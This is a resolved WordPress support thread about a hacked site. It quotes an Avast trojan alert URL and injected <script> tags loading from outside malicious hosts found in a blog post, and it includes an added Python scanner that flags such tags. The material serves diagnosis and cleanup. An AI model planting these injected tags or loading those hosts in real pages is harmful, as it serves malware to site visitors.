[resolved] Security breach? (11 posts)

  1. matthewpaul
    Member
    Posted 4 years ago #

    The last 3 days, when visiting one of my sites (http://www.bullsource.com), I've received a virus warning from Avast containing this info:

    http://edisonsbar.com/in.cgi?4|>{gzip} [L] HTML:RedirME-inf [Trj] (0)

    I've only been able to replicate this once per day. I searched this on Google and found this: http://jsunpack.jeek.org/dec/go?report=226656eee9412647c8c49c892e9473200486e1eb.

    Does anyone know what this means?

  2. matthewpaul
    Member
    Posted 4 years ago #

    I was able to reproduce the issue again.

    When visiting the site, my virus protection program, Avast, shows this message:

    TROJAN HORSE BLOCKED

    avast Web Shield has blocked a threat. No further action is required.

    Object: http://edisonsbar.com/in.cgi?4|>{gzip}
    Infection: HTML:RedirME-inf [Trj]
    Action: Connection aborted
    Process: C:\Program Files\Mozilla\Firefox\firefox.exe

    The threat was detected and blocked while downloading an item from the web.

  3. matthewpaul
    Member
    Posted 4 years ago #

    This is happening on one of my other WordPress sites (on the same server). I noticed that this malicious code was being inserted into the index page within the code of the first blog post:

    <h5><script src=http://maroon.karenegren.com/js/jquery.min.js></script></h5>

    and

    <h5><script src=http://yellow.gaindirectory.org/js/jquery.min.js></script></h5>

    I never added this code and it's not in the template file of the theme.

  4. I believe this is part of a current hack that is injecting code into all PHP files (not just WordPress) on a few shared hosting providers. Remain calm and carefully follow this guide:

    http://codex.wordpress.org/FAQ_My_site_was_hacked

  5. matthewpaul
    Member
    Posted 4 years ago #

    My non-WordPress sites (on the same server) are unaffected. I contacted the hosting provider (mt) and they haven't had any other reports of this.

  6. matthewpaul
    Member
    Posted 4 years ago #

    It appears that the hack was injected into the database, not the PHP files. The malicious code was added to a blog post.

  7. Remove the code from the post, then run through this guide to make sure that nothing else is wrong:

    http://codex.wordpress.org/FAQ_My_site_was_hacked

    When you're done, implement some (if not all) of the recommended security measures:

    http://codex.wordpress.org/Hardening_WordPress
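
To find every post that carries an injected tag like the ones quoted earlier in the thread, the post bodies can be scanned for script tags that are inline or load from another host. This is an added example, not code from the thread or from WordPress; it assumes the rows were exported as (ID, post_content) pairs from the wp_posts table, and `ALLOWED_HOSTS` and the sample rows are constructed for illustration.

```python
from html.parser import HTMLParser
from urllib.parse import urlparse

# Assumption: the only host this site should load scripts from in post bodies.
ALLOWED_HOSTS = {"www.bullsource.com"}

class ScriptFinder(HTMLParser):
    """Records the src of each <script> tag (None for inline scripts)."""
    def __init__(self):
        super().__init__()
        self.sources = []

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            self.sources.append(dict(attrs).get("src"))

def suspicious_scripts(html, allowed=ALLOWED_HOSTS):
    """Return script references in html that are inline or load off-site."""
    finder = ScriptFinder()
    finder.feed(html)
    finder.close()
    flagged = []
    for src in finder.sources:
        if not src:
            flagged.append("(inline script)")
            continue
        host = urlparse(src.strip()).hostname
        # Relative URLs have no host and stay on the site itself.
        if host is not None and host.lower() not in allowed:
            flagged.append(src)
    return flagged

def scan_posts(rows, allowed=ALLOWED_HOSTS):
    """rows: iterable of (post_id, post_content). Returns {post_id: [hits]}."""
    report = {}
    for post_id, content in rows:
        hits = suspicious_scripts(content or "", allowed)
        if hits:
            report[post_id] = hits
    return report

# Constructed sample rows; post 12 carries the tag quoted in the thread.
SAMPLE_ROWS = [
    (11, "<p>Ordinary post with a <a href='http://example.org/'>link</a>.</p>"),
    (12, "<p>Latest news</p><h5><script src=http://maroon.karenegren.com/js/jquery.min.js></script></h5>"),
    (13, '<script src="/wp-includes/js/jquery/jquery.js"></script><p>Local script</p>'),
]

if __name__ == "__main__":
    for post_id, hits in scan_posts(SAMPLE_ROWS).items():
        print(post_id, hits)
```

The parser handles unquoted `src` values such as the ones in the injected tags, which a simple quoted-attribute pattern would miss.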

  8. matthewpaul
    Member
    Posted 4 years ago #

    Do you know of a good plugin to install for security? The recommended ones seem to be outdated and I was experiencing issues with Secure WordPress.

  9. I honestly don't recommend any of them. Most of the current security plugins simply scan for "vulnerabilities" and the rest simply provide a software method of implementing the recommended security measures. If you used a plugin like that, all a hacker would have to do is reset your plugins to drop all of your security measures. It's better to follow the guide that I linked to and manually implement the security measures.

  10. matthewpaul
    Member
    Posted 4 years ago #

    Thanks.

  11. You're welcome!

Topic Closed

This topic has been closed to new replies.